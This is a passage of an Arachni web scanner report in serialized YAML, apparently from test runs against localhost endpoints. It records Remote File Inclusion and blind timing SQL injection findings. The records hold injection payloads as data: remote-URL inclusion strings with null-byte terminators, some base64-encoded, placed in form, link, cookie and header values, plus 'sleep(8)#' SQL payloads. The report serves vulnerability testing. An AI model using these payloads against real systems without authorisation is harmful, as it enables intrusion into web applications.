      :id: 705cd559b16e6946826207c2199bd890
    references: 
      WASC: http://projects.webappsec.org/Remote-File-Inclusion
      Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
    regexp: 705cd559b16e6946826207c2199bd890
    regexp_match: 705cd559b16e6946826207c2199bd890
    remedy_code: ""
    remedy_guidance: |-
      Enforce strict validation and filtering
                          on user inputs.
    response: |
      705cd559b16e6946826207c2199bd890

    severity: High
    tags: 
    - remote
    - file
    - inclusion
    - injection
    - regexp
    url: http://localhost:9251/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    The web application can be forced to include
        3rd party remote content which can often lead to arbitrary code
        execution, amongst other attacks.
  elem: form
  internal_modname: RFI
  metasploitable: unix/webapp/arachni_php_include
  method: GET
  mod_name: Remote File Inclusion
  name: Remote file inclusion
  references: 
    WASC: http://projects.webappsec.org/Remote-File-Inclusion
    Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
  remedy_code: ""
  remedy_guidance: |-
    Enforce strict validation and filtering
                        on user inputs.
  severity: High
  tags: 
  - remote
  - file
  - inclusion
  - injection
  - regexp
  url: http://localhost:9251/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      The web application can be forced to include
          3rd party remote content which can often lead to arbitrary code
          execution, amongst other attacks.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value;cookie=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Connection: close
        Server: thin 1.4.1 codename Chromeo
    id: 705cd559b16e6946826207c2199bd890
    injected: !binary |
      ZGVmYXVsdGFyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
      AA==

    internal_modname: RFI
    metasploitable: unix/webapp/arachni_php_include
    method: GET
    mod_name: Remote File Inclusion
    name: Remote file inclusion
    opts: 
      :redundant: false
      :async: true
      :regexp: 705cd559b16e6946826207c2199bd890
      :match: 705cd559b16e6946826207c2199bd890
      :substring: 705cd559b16e6946826207c2199bd890
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :follow_location: false
      :injected_orig: arachni.github.com/arachni/rfi.md5.txt
      :altered: input
      :element: form
      :params: 
        input: !binary |
          ZGVmYXVsdGFyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
          AA==

      :injected: !binary |
        ZGVmYXVsdGFyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
        AA==

      :combo: 
        input: !binary |
          ZGVmYXVsdGFyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
          AA==

      :action: http://localhost:9251/form/append
      :verification: false
      :id: 705cd559b16e6946826207c2199bd890
    references: 
      WASC: http://projects.webappsec.org/Remote-File-Inclusion
      Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
    regexp: 705cd559b16e6946826207c2199bd890
    regexp_match: 705cd559b16e6946826207c2199bd890
    remedy_code: ""
    remedy_guidance: |-
      Enforce strict validation and filtering
                          on user inputs.
    response: |
      705cd559b16e6946826207c2199bd890

    severity: High
    tags: 
    - remote
    - file
    - inclusion
    - injection
    - regexp
    url: http://localhost:9251/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    The web application can be forced to include
        3rd party remote content which can often lead to arbitrary code
        execution, amongst other attacks.
  elem: link
  internal_modname: RFI
  metasploitable: unix/webapp/arachni_php_include
  method: GET
  mod_name: Remote File Inclusion
  name: Remote file inclusion
  references: 
    WASC: http://projects.webappsec.org/Remote-File-Inclusion
    Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
  remedy_code: ""
  remedy_guidance: |-
    Enforce strict validation and filtering
                        on user inputs.
  severity: High
  tags: 
  - remote
  - file
  - inclusion
  - injection
  - regexp
  url: http://localhost:9251/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      The web application can be forced to include
          3rd party remote content which can often lead to arbitrary code
          execution, amongst other attacks.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Connection: close
        Server: thin 1.4.1 codename Chromeo
    id: 705cd559b16e6946826207c2199bd890
    injected: !binary |
      aFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
      AA==

    internal_modname: RFI
    metasploitable: unix/webapp/arachni_php_include
    method: GET
    mod_name: Remote File Inclusion
    name: Remote file inclusion
    opts: 
      :redundant: false
      :async: true
      :regexp: 705cd559b16e6946826207c2199bd890
      :match: 705cd559b16e6946826207c2199bd890
      :substring: 705cd559b16e6946826207c2199bd890
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :follow_location: false
      :injected_orig: hTtP://arachni.github.com/arachni/rfi.md5.txt
      :altered: input
      :element: link
      :params: 
        input: !binary |
          aFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
          AA==

      :injected: !binary |
        aFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
        AA==

      :combo: 
        input: !binary |
          aFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
          AA==

      :action: http://localhost:9251/link/straight?input=default
      :verification: false
      :id: 705cd559b16e6946826207c2199bd890
    references: 
      WASC: http://projects.webappsec.org/Remote-File-Inclusion
      Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
    regexp: 705cd559b16e6946826207c2199bd890
    regexp_match: 705cd559b16e6946826207c2199bd890
    remedy_code: ""
    remedy_guidance: |-
      Enforce strict validation and filtering
                          on user inputs.
    response: |
      705cd559b16e6946826207c2199bd890

    severity: High
    tags: 
    - remote
    - file
    - inclusion
    - injection
    - regexp
    url: http://localhost:9251/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    The web application can be forced to include
        3rd party remote content which can often lead to arbitrary code
        execution, amongst other attacks.
  elem: link
  internal_modname: RFI
  metasploitable: unix/webapp/arachni_php_include
  method: GET
  mod_name: Remote File Inclusion
  name: Remote file inclusion
  references: 
    WASC: http://projects.webappsec.org/Remote-File-Inclusion
    Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
  remedy_code: ""
  remedy_guidance: |-
    Enforce strict validation and filtering
                        on user inputs.
  severity: High
  tags: 
  - remote
  - file
  - inclusion
  - injection
  - regexp
  url: http://localhost:9251/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      The web application can be forced to include
          3rd party remote content which can often lead to arbitrary code
          execution, amongst other attacks.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Connection: close
        Server: thin 1.4.1 codename Chromeo
    id: 705cd559b16e6946826207c2199bd890
    injected: defaulthTtP://arachni.github.com/arachni/rfi.md5.txt
    internal_modname: RFI
    metasploitable: unix/webapp/arachni_php_include
    method: GET
    mod_name: Remote File Inclusion
    name: Remote file inclusion
    opts: 
      :redundant: false
      :async: true
      :regexp: 705cd559b16e6946826207c2199bd890
      :match: 705cd559b16e6946826207c2199bd890
      :substring: 705cd559b16e6946826207c2199bd890
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :follow_location: false
      :injected_orig: hTtP://arachni.github.com/arachni/rfi.md5.txt
      :altered: input
      :element: link
      :params: 
        input: defaulthTtP://arachni.github.com/arachni/rfi.md5.txt
      :injected: defaulthTtP://arachni.github.com/arachni/rfi.md5.txt
      :combo: 
        input: defaulthTtP://arachni.github.com/arachni/rfi.md5.txt
      :action: http://localhost:9251/link/append?input=default
      :verification: false
      :id: 705cd559b16e6946826207c2199bd890
    references: 
      WASC: http://projects.webappsec.org/Remote-File-Inclusion
      Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
    regexp: 705cd559b16e6946826207c2199bd890
    regexp_match: 705cd559b16e6946826207c2199bd890
    remedy_code: ""
    remedy_guidance: |-
      Enforce strict validation and filtering
                          on user inputs.
    response: |
      705cd559b16e6946826207c2199bd890

    severity: High
    tags: 
    - remote
    - file
    - inclusion
    - injection
    - regexp
    url: http://localhost:9251/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    The web application can be forced to include
        3rd party remote content which can often lead to arbitrary code
        execution, amongst other attacks.
  elem: cookie
  internal_modname: RFI
  metasploitable: unix/webapp/arachni_php_include
  method: GET
  mod_name: Remote File Inclusion
  name: Remote file inclusion
  references: 
    WASC: http://projects.webappsec.org/Remote-File-Inclusion
    Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
  remedy_code: ""
  remedy_guidance: |-
    Enforce strict validation and filtering
                        on user inputs.
  severity: High
  tags: 
  - remote
  - file
  - inclusion
  - injection
  - regexp
  url: http://localhost:9251/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      The web application can be forced to include
          3rd party remote content which can often lead to arbitrary code
          execution, amongst other attacks.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=hTtP://arachni.github.com/arachni/rfi.md5.txt%00;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Connection: close
        Server: thin 1.4.1 codename Chromeo
    id: 705cd559b16e6946826207c2199bd890
    injected: !binary |
      aFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
      AA==

    internal_modname: RFI
    metasploitable: unix/webapp/arachni_php_include
    method: GET
    mod_name: Remote File Inclusion
    name: Remote file inclusion
    opts: 
      :redundant: false
      :async: true
      :regexp: 705cd559b16e6946826207c2199bd890
      :match: 705cd559b16e6946826207c2199bd890
      :substring: 705cd559b16e6946826207c2199bd890
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :follow_location: false
      :injected_orig: hTtP://arachni.github.com/arachni/rfi.md5.txt
      :altered: cookie
      :element: cookie
      :params: {}

      :cookies: 
        cookie: !binary |
          aFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
          AA==

      :injected: !binary |
        aFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
        AA==

      :combo: 
        cookie: !binary |
          aFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
          AA==

      :action: http://localhost:9251/cookie/straight
      :verification: false
      :id: 705cd559b16e6946826207c2199bd890
    references: 
      WASC: http://projects.webappsec.org/Remote-File-Inclusion
      Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
    regexp: 705cd559b16e6946826207c2199bd890
    regexp_match: 705cd559b16e6946826207c2199bd890
    remedy_code: ""
    remedy_guidance: |-
      Enforce strict validation and filtering
                          on user inputs.
    response: |
      705cd559b16e6946826207c2199bd890

    severity: High
    tags: 
    - remote
    - file
    - inclusion
    - injection
    - regexp
    url: http://localhost:9251/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    The web application can be forced to include
        3rd party remote content which can often lead to arbitrary code
        execution, amongst other attacks.
  elem: cookie
  internal_modname: RFI
  metasploitable: unix/webapp/arachni_php_include
  method: GET
  mod_name: Remote File Inclusion
  name: Remote file inclusion
  references: 
    WASC: http://projects.webappsec.org/Remote-File-Inclusion
    Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
  remedy_code: ""
  remedy_guidance: |-
    Enforce strict validation and filtering
                        on user inputs.
  severity: High
  tags: 
  - remote
  - file
  - inclusion
  - injection
  - regexp
  url: http://localhost:9251/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      The web application can be forced to include
          3rd party remote content which can often lead to arbitrary code
          execution, amongst other attacks.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+valuehTtP://arachni.github.com/arachni/rfi.md5.txt%00
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Connection: close
        Server: thin 1.4.1 codename Chromeo
    id: 705cd559b16e6946826207c2199bd890
    injected: !binary |
      Y29va2llIHZhbHVlaFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5p
      L3JmaS5tZDUudHh0AA==

    internal_modname: RFI
    metasploitable: unix/webapp/arachni_php_include
    method: GET
    mod_name: Remote File Inclusion
    name: Remote file inclusion
    opts: 
      :redundant: false
      :async: true
      :regexp: 705cd559b16e6946826207c2199bd890
      :match: 705cd559b16e6946826207c2199bd890
      :substring: 705cd559b16e6946826207c2199bd890
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :follow_location: false
      :injected_orig: hTtP://arachni.github.com/arachni/rfi.md5.txt
      :altered: cookie2
      :element: cookie
      :params: {}

      :cookies: 
        cookie2: !binary |
          Y29va2llIHZhbHVlaFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5p
          L3JmaS5tZDUudHh0AA==

      :injected: !binary |
        Y29va2llIHZhbHVlaFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5p
        L3JmaS5tZDUudHh0AA==

      :combo: 
        cookie2: !binary |
          Y29va2llIHZhbHVlaFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5p
          L3JmaS5tZDUudHh0AA==

      :action: http://localhost:9251/cookie/append
      :verification: false
      :id: 705cd559b16e6946826207c2199bd890
    references: 
      WASC: http://projects.webappsec.org/Remote-File-Inclusion
      Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
    regexp: 705cd559b16e6946826207c2199bd890
    regexp_match: 705cd559b16e6946826207c2199bd890
    remedy_code: ""
    remedy_guidance: |-
      Enforce strict validation and filtering
                          on user inputs.
    response: |
      705cd559b16e6946826207c2199bd890

    severity: High
    tags: 
    - remote
    - file
    - inclusion
    - injection
    - regexp
    url: http://localhost:9251/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    The web application can be forced to include
        3rd party remote content which can often lead to arbitrary code
        execution, amongst other attacks.
  elem: header
  internal_modname: RFI
  metasploitable: unix/webapp/arachni_php_include
  method: GET
  mod_name: Remote File Inclusion
  name: Remote file inclusion
  references: 
    WASC: http://projects.webappsec.org/Remote-File-Inclusion
    Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
  remedy_code: ""
  remedy_guidance: |-
    Enforce strict validation and filtering
                        on user inputs.
  severity: High
  tags: 
  - remote
  - file
  - inclusion
  - injection
  - regexp
  url: http://localhost:9251/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      The web application can be forced to include
          3rd party remote content which can often lead to arbitrary code
          execution, amongst other attacks.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_userhTtP://arachni.github.com/arachni/rfi.md5.txt
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Connection: close
        Server: thin 1.4.1 codename Chromeo
    id: 705cd559b16e6946826207c2199bd890
    injected: arachni_userhTtP://arachni.github.com/arachni/rfi.md5.txt
    internal_modname: RFI
    metasploitable: unix/webapp/arachni_php_include
    method: GET
    mod_name: Remote File Inclusion
    name: Remote file inclusion
    opts: 
      :redundant: false
      :async: true
      :regexp: 705cd559b16e6946826207c2199bd890
      :match: 705cd559b16e6946826207c2199bd890
      :substring: 705cd559b16e6946826207c2199bd890
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :follow_location: false
      :injected_orig: hTtP://arachni.github.com/arachni/rfi.md5.txt
      :altered: User-Agent
      :element: header
      :params: 
      :headers: 
        User-Agent: arachni_userhTtP://arachni.github.com/arachni/rfi.md5.txt
      :injected: arachni_userhTtP://arachni.github.com/arachni/rfi.md5.txt
      :combo: 
        User-Agent: arachni_userhTtP://arachni.github.com/arachni/rfi.md5.txt
      :action: http://localhost:9251/header/append
      :verification: false
      :id: 705cd559b16e6946826207c2199bd890
    references: 
      WASC: http://projects.webappsec.org/Remote-File-Inclusion
      Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
    regexp: 705cd559b16e6946826207c2199bd890
    regexp_match: 705cd559b16e6946826207c2199bd890
    remedy_code: ""
    remedy_guidance: |-
      Enforce strict validation and filtering
                          on user inputs.
    response: |
      705cd559b16e6946826207c2199bd890

    severity: High
    tags: 
    - remote
    - file
    - inclusion
    - injection
    - regexp
    url: http://localhost:9251/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    The web application can be forced to include
        3rd party remote content which can often lead to arbitrary code
        execution, amongst other attacks.
  elem: header
  internal_modname: RFI
  metasploitable: unix/webapp/arachni_php_include
  method: GET
  mod_name: Remote File Inclusion
  name: Remote file inclusion
  references: 
    WASC: http://projects.webappsec.org/Remote-File-Inclusion
    Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
  remedy_code: ""
  remedy_guidance: |-
    Enforce strict validation and filtering
                        on user inputs.
  severity: High
  tags: 
  - remote
  - file
  - inclusion
  - injection
  - regexp
  url: http://localhost:9251/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      The web application can be forced to include
          3rd party remote content which can often lead to arbitrary code
          execution, amongst other attacks.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: hTtP://arachni.github.com/arachni/rfi.md5.txt
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Connection: close
        Server: thin 1.4.1 codename Chromeo
    id: 705cd559b16e6946826207c2199bd890
    injected: hTtP://arachni.github.com/arachni/rfi.md5.txt
    internal_modname: RFI
    metasploitable: unix/webapp/arachni_php_include
    method: GET
    mod_name: Remote File Inclusion
    name: Remote file inclusion
    opts: 
      :redundant: false
      :async: true
      :regexp: 705cd559b16e6946826207c2199bd890
      :match: 705cd559b16e6946826207c2199bd890
      :substring: 705cd559b16e6946826207c2199bd890
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :follow_location: false
      :injected_orig: hTtP://arachni.github.com/arachni/rfi.md5.txt
      :altered: User-Agent
      :element: header
      :params: 
      :headers: 
        User-Agent: hTtP://arachni.github.com/arachni/rfi.md5.txt
      :injected: hTtP://arachni.github.com/arachni/rfi.md5.txt
      :combo: 
        User-Agent: hTtP://arachni.github.com/arachni/rfi.md5.txt
      :action: http://localhost:9251/header/straight
      :verification: false
      :id: 705cd559b16e6946826207c2199bd890
    references: 
      WASC: http://projects.webappsec.org/Remote-File-Inclusion
      Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
    regexp: 705cd559b16e6946826207c2199bd890
    regexp_match: 705cd559b16e6946826207c2199bd890
    remedy_code: ""
    remedy_guidance: |-
      Enforce strict validation and filtering
                          on user inputs.
    response: |
      705cd559b16e6946826207c2199bd890

    severity: High
    tags: 
    - remote
    - file
    - inclusion
    - injection
    - regexp
    url: http://localhost:9251/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: POST
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mysql/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: sleep(8)#
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: POST
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: sleep(__TIME__)#
      :skip_orig: true
      :injected_orig: sleep(8)#
      :altered: input
      :element: form
      :params: 
        input: sleep(8)#
      :follow_location: true
      :injected: sleep(8)#
      :combo: 
        input: sleep(8)#
      :action: http://localhost:7499/mysql/form/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mysql/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: POST
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mysql/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: defaultsleep(8)#
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: POST
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: sleep(__TIME__)#
      :skip_orig: true
      :injected_orig: sleep(8)#
      :altered: input
      :element: form
      :params: 
        input: defaultsleep(8)#
      :follow_location: true
      :injected: defaultsleep(8)#
      :combo: 
        input: defaultsleep(8)#
      :action: http://localhost:7499/mysql/form/append
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mysql/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mysql/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: sleep(8)#
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: sleep(__TIME__)#
      :skip_orig: true
      :injected_orig: sleep(8)#
      :altered: input
      :element: link
      :params: 
        input: sleep(8)#
